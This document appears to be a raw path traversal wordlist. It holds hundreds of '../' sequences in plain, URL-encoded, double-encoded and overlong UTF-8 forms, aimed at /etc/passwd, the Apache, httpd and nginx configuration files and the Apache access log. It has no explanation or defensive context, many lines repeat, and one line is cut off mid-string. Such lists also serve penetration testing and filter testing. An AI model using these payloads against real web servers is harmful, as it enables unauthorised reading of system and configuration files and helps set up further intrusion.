././././../../../../././././....//....//....//....//....//..\\..\\..\\..\\..\\../\../\../\../\../\../\etc../\../\../../../../../passwd
../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../../../../../etc/passwd
../../../..//etc/passwd
../../../../../../../../etc/passwd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%252F..%252F..%252F..%252Fetc%252Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%2F..%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F..%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2Fetc%2Fpasswd
..%5C%2E%2E%5C..%5C%2E%2E%5Cetc%5Cpasswd
..%2F..%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C%2E%2E%5C..%5Cetc%5Cpasswd
../..//..//..//..//etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
../../../../../etc/passwd
../../../../../../../etc/passwd
..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
../../../../../../../../../etc/passwd
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F%2E%2E%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
../..%2F../..%2F../..%2F../etc/passwd
..%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../../etc/passwd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd
..%2F..%2F..%2F..%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F%2E%2E%2Fetc%2Fpasswd
..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%2F..%2F..%2F..%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%2F..%2F..%2F..%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%2F%2E%2E%2F..%2F%2E%2E%2F..%2F%2E%2E%2F..%2Fetc%2Fpasswd
../../../../../../../../etc/passwd
../../../../../etc/passwd
../../../../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../../../etc/passwd
../../../../etc/passwd
../etc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
../..%2F..%2F..%2Fetc%2Fpasswd
../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../etc/passwd
../../../etc/passwd
../../../etc/passwd
../../../../../etc/passwd
../../../../../etc/passwd
../../../../../../../../etc/passwd
%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64%00
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%252e%252e%252f%252e%252e%252f%252e%252e%252f%65%74%63%252f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%252e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%65%74%252f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2fetc%2fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%65%74%63%252f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%252e%252e%252f%2e%252e%252f%2e%252e%252f%2e%252e%252f%65%74%252f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%2e%252e%252f%65%74%252f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%65%74%63%252f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%65%74%63%252f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
`%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252
../../../../../../../../../etc/apache2/apache2.conf
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fapache2%2Fapache2.conf
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afapache2%2Fapache2.conf
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fapache2%252fapache2.conf
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc%255capache2%255capache2.conf
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9capache2%c1%9capache2.conf
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fetc%252fapache2%252fapache2.conf
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cetc%252fapache2%255capache2.conf
....//....//....//....//....//....//....//....//etc//apache2//apache2.conf
....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\etc\\\\apache2\\\\apache2.conf
....%252f....%252f....%252f....%252f....%252f....%252f....%252fetc%252fapache2%252fapache2.conf
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/apache2/apache2.conf
%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\etc\\apache2\\apache2.conf
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/apache2/apache2.conf
%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\etc\\apache2\\apache2.conf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fapache2%2Fapache2.conf
%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\etc\\apache2\\apache2.conf
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66etc%25%32%66apache2%25%32%66apache2.conf
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63apache2%25%35%63apache2.conf
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/apache2/apache2.conf
%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\etc\\apache2\\apache2.conf
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fapache2%252fapache2.conf
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255capache2%255capache2.conf
../../../../../../../../../etc/httpd/conf/httpd.conf
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fconf%2Fhttpd.conf
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afhttpd%2Fconf%2Fhttpd.conf
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fhttpd%252fconf%252fhttpd.conf
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc%255chttpd%255cconf%255chttpd.conf
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9chttpd%c1%9cconf%c1%9chttpd.conf
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fetc%252fhttpd%252fconf%252fhttpd.conf
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cetc%252fhttpd%255cconf%252fhttpd.conf
....//....//....//....//....//....//....//....//etc//httpd//conf//httpd.conf
....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\....\\\\etc\\\\httpd\\\\conf\\\\httpd.conf
....%252f....%252f....%252f....%252f....%252f....%252f....%252fetc%252fhttpd%252fconf%252fhttpd.conf
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/httpd/conf/httpd.conf
%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\etc\\httpd\\conf\\httpd.conf
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/conf/httpd.conf
%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\etc\\httpd\\conf\\httpd.conf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhttpd%2Fconf%2Fhttpd.conf
%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\etc\\httpd\\conf\\httpd.conf
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66etc%25%32%66httpd%25%32%66conf%25%32%66httpd.conf
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63httpd%25%35%63conf%25%35%63httpd.conf
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/httpd/conf/httpd.conf
%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\etc\\httpd\\conf\\httpd.conf
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fhttpd%252fconf%252fhttpd.conf
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255chttpd%255cconf%255chttpd.conf
../../../../../../../../../etc/nginx/nginx.conf
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fnginx%2Fnginx.conf
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afnginx%2Fnginx.conf
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fnginx%252fnginx.conf
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc%255cnginx%255cnginx.conf
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cnginx%c1%9cnginx.conf
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fetc%252fnginx%252fnginx.conf
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cetc%252fnginx%255cnginx.conf
....//....//....//....//....//....//....//....//etc//nginx//nginx.conf
....\\....\\....\\....\\....\\....\\....\\....\\etc\\nginx\\nginx.conf
....%252f....%252f....%252f....%252f....%252f....%252f....%252fetc%252fnginx%252fnginx.conf
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/nginx/nginx.conf
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\nginx\nginx.conf
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/nginx/nginx.conf
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\etc\nginx\nginx.conf
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fnginx%2Fnginx.conf
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\nginx\nginx.conf
..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66..%25%32%66etc%25%32%66nginx%25%32%66nginx.conf
..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63nginx%25%35%63nginx.conf
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/nginx/nginx.conf
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\nginx\nginx.conf
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fnginx%252fnginx%252econf
%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255cetc%255chttpd%255cconf%255chttpd.conf
../../../../../../../../../var/log/apache2/access.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afvar%c0%aflog%c0%afapache2%c0%afaccess.log
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fvar%252flog%252fapache2%252faccess.log
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cvar%255clog%255capache2%255caccess.log
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9capache2%c1%9clog%c1%9caccess.log
..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fvar%252flog%252fapache2%252faccess.log
..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255c..%252e%252e%255cvar%252flog%255capache2%255caccess.log
....//....//....//....//....//....//....//....//var//log//apache2//access.log
....\\....\\....\\....\\....\\....\\....\\....\\var\\log\\apache2\\access.log
....%252f....%252f....%252f....%252f....%252f....%252f....%252fvar%252flog%252fapache2%252faccess.log
